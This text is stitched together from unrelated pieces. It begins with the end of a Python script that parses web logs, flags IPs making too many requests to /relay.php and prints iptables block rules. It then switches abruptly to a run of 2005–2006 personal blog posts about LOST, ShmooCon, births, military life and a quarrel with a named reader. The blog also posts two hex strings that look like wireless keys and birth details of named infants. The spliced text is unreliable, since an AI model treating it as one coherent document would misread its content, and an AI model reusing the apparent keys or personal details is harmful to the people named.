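10.0.0.5 - - [12/Mar/2006:10:00:02 -0500] "GET /relay.php?u=http://b.example/ HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2006:10:00:03 -0500] "GET /relay.php?u=http://c.example/ HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2006:10:00:04 -0500] "GET /relay.php?u=http://d.example/ HTTP/1.1" 200 512
192.0.2.7 - - [12/Mar/2006:10:01:00 -0500] "GET /relay.php?u=http://e.example/ HTTP/1.1" 200 512
192.0.2.7 - - [12/Mar/2006:10:02:00 -0500] "GET /index.php HTTP/1.1" 200 2048
this line is garbage and must be skipped
"""


def parse_line(line: str) -> Optional[dict]:
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["path"] = fields["target"].split("?", 1)[0]   # drop the query string
    return fields


def count_hits(lines: Iterable[str], path: str) -> Counter:
    """Requests per client IP for exactly `path`, whatever the status code."""
    hits: Counter = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"] == path:
            hits[rec["ip"]] += 1
    return hits


def offenders(lines: Iterable[str], path: str, limit: int) -> list:
    """IPs with more than `limit` requests to `path`, busiest first."""
    hits = count_hits(lines, path)
    return [ip for ip, n in hits.most_common() if n > limit]


def block_rules(ips: Iterable[str]) -> list:
    """iptables commands to drop the offending sources (assumed firewall)."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in ips]


if __name__ == "__main__":
    bad = offenders(SAMPLE_LOG.splitlines(), "/relay.php", limit=3)
    for rule in block_rules(bad):
        print(rule)
```

Run from cron against the rotated log of the day; the regex is anchored so a malformed line yields None instead of a false match, and the query string is stripped so every relay target counts against the same path.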

A leaked image from an upcoming episode of LOST. Could it be that Henry Gale is telling the truth? Or could this just be some sort of flash back?
The original post can be found here: http://lost-and-gone-forever.blogspot.com/2006/03/my-most-controversial-post-ever.html
The image mirror is here:
http://img73.imageshack.us/img73/3397/3783989920ig.jpg
And you can digg it here:
http://digg.com/links/leaked_LOST_picture

I want to take this opportunity to pay some homage to a great man that I had the pleasure of watching on TV at great length, thanks to my dad. Don Knotts, also known as Barney Fife from the Andy Griffith show. Rest In Peace:
I found out from the Washington Post at this article:
http://www.washingtonpost.com/wp-dyn/content/article/2006/02/25/AR2006022501535.html

Today I saw on Bugtraq a new 0-day coming that affects all up to date versions of Windows. The most extraordinary part of this, and similar disclosures, is their workarounds. Since Redmond has decided not to patch until a later date, it is up to the discloser or a like-minded individual to figure out how to protect the masses. Guess what ends up being the fix? “Disable said Microsoft FEATURE”.

Geez. I never have time anymore to put something on this darn thing. I think I am going to stop apologizing for how long it takes me to post, because it is quite quickly becoming the norm. So anyways, since my last post, I have been to ShmooCon ‘06
I met some great people to include but not limited to, Lance James, Kevin Mitnick, Fyodor - A.K.A the creator of NMAP, Skydog, DC-Mike, and Simple Nomad.

Yeah, I know it’s been a while AGAIN since I have posted, but I just wanted to say Happy New Years to everyone. This year is going to be a very different one for me since my wife and I are expecting in Feb. I am really excited about my future son. It is a blessing to be able to bring a life into the world, and a big responsibility. I am also starting college back up.

Huge shout out to my best friend Heath Mouton!! Congratulations man!
Name: Rayne Marie Mouton
Weight: 3 lbs 9 Oz
Height: 17 inches
Born December 13th 2005 at 5:27 PM
The reason for the late posting is because my BEST BUDDY failed to mention it to me. ;-) Still love ya man.
jd.

I have created this post to invite all who read this (all 5 of ya, yes, I know your IPs by heart) to a game that was initiated out of a forum thread on the Hak.5 Forums. If you would like to join the game, by you commenting on this post you are accepting an agreement that ANYTHING that happens across this VPN is not my or any of the participants fault.

Just a real quick FYI. Since I have been getting more and more into the IPTV scene, I figured that I would add links to my favorite shows. I will most indubitably be adding more, but this is a good start. Check it out over
<——————– There..
oops.. now there —————————————————–>

December 2nd, I drove down to Williamsburg VA to meet up with the guys from Hak.5 and Frank Linhares. For those of you who don’t know. Hak.5 is an IPTV (Vidcast) show, which basically boils down to a TV show on the internet. Anyways, I got to meet up with these fellas and a couple other interesting people. While I was there, I had the privilege of helping out not only in the live techPhile podcast by Frank Linhares, but also the ‘glue’ segments of Ep 5 of Hak.

Well if you were wondering about me, I didn’t die. I am working on a super secret project for Frank Linhares of techPhile.ca
But don’t tell anyone! That is secret squirrel news. I have also submitted some logo ideas for the new Auditor Security Collection. You can vote for me: HERE
I also got a HP dv1420us which, so far, I really like. It doesn’t like linux too much, but it is challenging me to learn more about the kernel and other aspects of linux to fix the problems.

I was promoted to the Rank of Sergeant. Just wanted to let people know. And the reason why this entry is so short, is NOT because I am not excited about it. It’s because I have better things to do right now ;-)
Sgt jd.mubix

Duder,
CONGRATULATIONS!
Mia Kei Duder
Born October 13th 2005 @ 1:55 PM CST
6lbs 12 Oz - 20 Inches
Our hearts go out to you and yours. We wish you the best of luck.
jd.
P.S. Sorry it had to be a girl ;-)

Most of us in the industry know what the Slashdot effect is. But for those who don’t: Slashdot.org has such a following that, when a news article is posted on Slashdot, so many users click on the links provided that an unintentional DDoS, or Distributed Denial of Service attack, is created, where the news site is basically killed by all the traffic that it instantly has to deal with. Well Digg.

I did a search on Digg.com and was surprised to see that not a soul has written about ShmooCon 2006. I guess all you west coasters only care about DefCon. That is discrimination and WE DON’T HAVE TO TAKE IT! Back to reality. Well, if you don’t know, ShmooCon is basically the DefCon for the east coast and is being held in Washington D.C. Registration is limited, unlike DefCon, so hurry and whip out those PayPal accounts.

For those of you who do not know Whitedust.net is the leading independent ‘hacker’ portal. Yes that’s right! All of you Skiddies out there, you may not know who you are but WE DO, this site is NOT for you. Now that that disclaimer is over:
Ladies and Gentlemen,
If you have been lucky, you’ve already seen them on /. or even on digg.com. Whitedust.net is an awesome site that has great articles relating to security and other such things.

Security oriented Linux Live CD “WHAX” is supposedly merging with Auditor.
Quick history of WHAX:
Whoppix based off Knoppix: Awesome CD
Whoppix gets a name change and base distro change: Not broken, don’t fix it.
New WHAX website gets hacked: ironic.
Sep 9th… We (WHAX) are merging with Auditor, we need a new name: Anyone up for a downhill run?
STILL NO UPDATE! What’s going on guys?

My wife and I did our first ultrasound today and IT’S A BOY!! When you decide that it is a good idea to send cash and gifts (jedi mind trick) … just email me at jd.mubix AT g m a i l DT c o m . In the meantime, start saving, my son is going to college, and yes, you are required by law to pay his way through college and any credit card bills he may incur going to frat parties and gaining his higher education ;-)

Ok, yeah you’ve got me. This is old news. But COME ON! Someone needs to send a Marine Drill Instructor over to the Army and whoop these guys into shape! The Windows version of America’s Army version 2.4 came out May 16th 2005. That is 127 days (4 months) at the time of this post. Where are the Linux and Mac versions?!?! We are still stuck in version 2.3. They haven’t even released an update so we can at the very least run Linux servers!

Update Some nice digg user decided to comment and inform me that this was the FIRST Bond book. Basically Bond before the toys. hmm, nope, still don’t like the idea.
**Ok. I’m pissed.**
Let me get this straight. You’ve got
A legendary name (“James Bond”)
A multi-million dollar market
A slew of Hollywood stars that have made 007 great
Fan clubs spanning the globe
MILLIONS OF DEDICATED 007 FANS

Are you guys trying to tell me something? I’m the dork at prom who hasn’t noticed the “Kick Me” sign on his back. What exactly is making y’all run away with lightning speed? Come on, be the stand up person and tell me. (For the Ashley Park people out there, this means LEAVE A COMMENT)

LADIES AND GENTLEMEN,
I am proud to announce that TechTV, the cable television channel that we know and USED to love, might just be making a comeback. In an ‘Aliens’ sort of revival, a year and a half after they were pwnd ‘merged’, it might be popping out on top of G4. For starters they are bringing back “Call for Help” with Leo Laporte. First seen on KevinRose.com, which is a blog written by, yup you guessed it, Kevin Rose, the next move is that the G4 Founder and CEO who engineered the dumbass move ‘merger’ has been FIRED!

I have officially determined 12 hour shifts suck. Whoever invented this crazy idea needs to be shot. Oh! I’ve got an idea! Instead of 3 people per day, which allowed all three to have proper recoup time, let’s make it just 2 on a 12 on, 12 off schedule! We can use that employee somewhere else! Sound like an issue of Dilbert? Yeah, I thought so too.
jd

We are back online! Yes, much to my reporters’ anguish they are back on the beat. They whined and complained. I think they just wanted another week off is all. Anyways, the news will start pouring back in once I kick a couple butts to the curb. I would like to take this opportunity to welcome a couple new faces to the R362 Approved community: BADFOO.NET and SBHIDEOUT.COM. They have rightfully taken their place among legends.

NOTICE: All updates are on hold till Tuesday. Sorry.
Not much has changed except for the hosting service.
Changes will be happening though. I will be adding a pod cast. Excited yet?
If you found me already, you are either:
Very, Very bored.
Someone I know.
Hope to see ya around.

I went to see The Transporter 2 tonight. Normally I watch movies using an ‘alternative’ method, but for action movies it is really hard to get into it without the 13 speakers blaring heart pumping music into your face for an eyeball-warping experience. I have to admit that this movie was great, but if it had not been for the fantastic sound effects, music, and overall audible feel to the movie, I would have thought less of it.

Yes that is right, you heard it here first! BADFOO.NET is up! I’m not saying that they (he) have content up yet, except for a pic of a hacked up HP. But I have assigned a couple reporters to this story and I will keep posting updates as this page evolves.

(Updated because people were having a hard time finding where I had put the site)
I am no longer going to post everything she writes to the main page. It is taking up too much space. From now on I will post when there is an update, and you can find it in the navigation bar. Hopefully I didn’t make it too hard to find.
jd.mubix
For those of you featured in the picture below, look at the left side of the page, find “Stupid People”, click that, then when “Ashley Park” shows up, click on her.

I found a site that breaks down the barriers between technology and rednecks! This revolutionary teaching method comes to us from Advanced Redneck Learning Center. You can also click the thumbnail below to print out this cue card for all of your redneck friends.
Ashley Park update: I posted her comment on the static page.

And here is what she sent me back:
WHAT THE FUCK EVER. I KNOW THAT I LOVE MY COUNTRY AND MY TROOPS. I KNOW THAT BUSH IS SENDING MORE OVER THERE TO BE KILLED. I HATE IT BUT I GUESS THAT IS WHERE PEOPLE MESSED UP FOR VOTING FOR HIM. I WASN’T TALKING ABOUT THE HIJACKERS THEMSELVES, BUT THEIR “BOSS” DUH. BUT YOU KNOW WHAT, I AM SO TIRED OF HEARING YOUR SHIT BECAUSE THAT IS ALL IT IS.

I sent her this today:
Ashley,
I think you watch the news too much. First: The reason why we can’t find the airplane hijackers of 9-11 is because they went up in a cloud of smoke just like all our loved ones did. Second: ‘They’ aren’t smarter than us. We are just a lot bigger target. What is easier to catch? A pillow or the piece of lint falling from it?

Should I respond and keep it going? Give me your comments.. or should I create a poll? If you want me to keep it going, should I:
Tell her to check out the site again, cause you know she hasn’t
Tell her off
Be nice …. again
You decide.
One of my readers was trying to post this in the comments. So here it is.

If this is your first time reading this, then you need to read this first: (Angry Reader?)
I got this today:
Well you know what, I have always had a problem believing people but I grew out of it. And now I realize why I never trusted people before: because they can’t be trusted. You post a lie on the internet and don’t even let anyone know it is a lie.

UPDATE: I just looked at your ‘referral’ page http://search.yahoo.com/search?p=www.usmc.com&fr=ieas-dns
… you did a search for www.usmc.com…
This speaks for itself:
Ashley: (A Comment on USMC: Crack down on Tats)
I can’t believe that they are doing this. Everyone in my boyfriend’s Platoon has a tat. They are over seas dying and they are worried about tattoos?!!!?!? Shouldn’t they be more worried about their safe …
I sent her this email:

UPDATE: This keyboard is NOT compatible with Windows Longhorn but sources speculate that Vista will support this new keyboard possibly starting late 2007
Microsoft has come up with a new keyboard that includes a curious button. This keyboard is said to have already been distributed to all of their employees globally. Room362 reporters followed one of the Redmond employees home in the chance that he/she might leak information on a global release date or possibly a picture of the keyboard.

Well there is reason behind it. I was following up on the Silent_Bob case. Nothing to report yet, but I am following up on some great leads:
The CIA currently has 10 operatives searching for Silent_Bob (information accredited to hacker: duder)
Offenses are still unknown but could be related to the CS Assassin back in 2000, who used a silenced USP and who police believe is still at large. (60 murders all over the country are accredited to this unknown killer.)

Let me be the first to welcome Gentoo into the 21st Century. Creating an Installer instead of a 40 page ‘Handbook’ was a bold and innovative move. In this bold move they have enticed new blood to this awesome distro such as the renowned Silent_Bob, who now goes under the alias thesb to avoid FBI and CIA warrants, but that is another story altogether. (Which I will follow up on if you, the reader, comment and tell me to) But back to Gentoo.

Ok, yes, again. It has been a while. But I am back. I got a new Wireless PCMCIA card (ORiNOCO a/b/g Combo Card Gold). So far it is a great card.
9AFED9BEADBBD9236159D54CAE - tsunami
1B59B6E87D19E9A6F1D37CB762 - home
’nuf said.

Age of Empires II - Age of Kings. That is a great game. It has something that not a lot of games have these days, which is replay value. Once you beat a game, that is it. No more fun. You know all the secrets.
That is where MMORPGs came into the picture. But still, most of them are lacking. You can get to Level 60 or Level 70 and you have reached the top.

Today is my last day on a looooog…. 12 hour shift work week. Right now I am hating my life. (Just because of work). It is so busy that I actually have to take a second of it to settle down and moan and complain. So here it is:

Right now I am taking a class called “Intro to Programming”. And yup! you guessed it! The first assignment is to make a Hello World program. For those who don’t know, that is the globally accepted first assignment for programming languages, be it HTML, Java, C++, PHP, Python, or Assembly. Now this is where I get to voice my opinion of Java so far: It bites! Any language that makes you write 3 lines of code just to print “Hello World” is gay.

(This is a joke) IN BREAKING NEWS: The Marine Corps has adopted the no Tat policy. In this bold move, it is Dishonorably discharging 80% of its current personnel due to this new “Clean or Out” program.

One should never be made to make a decision such as the one I’m about to share with you: Where I work, there are two Male restrooms. One is downstairs, still within ‘hurry’ distance, and the other is just across the hall. You are probably thinking, ‘Where is the decision in that?’. Well this is where it gets interesting. Both are alright for number 1 traffic. No big deal, in and out.

To celebrate the close of DefCon 13 here are my…
New Defcon (14) Resolutions.
Get l0gic a girl to take to DefCon
Get duder out to the east coast
Make and print Project Mentor T-Shirts to give away and wear to DefCon
Create a DCMar Group
Watch Family Guy and Futurama episodes as instructed by l0gic
Get BFA w/ Card

I have officially uncovered the US Air Force’s TOP SECRET plans for making a deadly infantry. The following image was stolen from a secret base in Roswell. I will stay with this story as long as it takes to unveil the truth.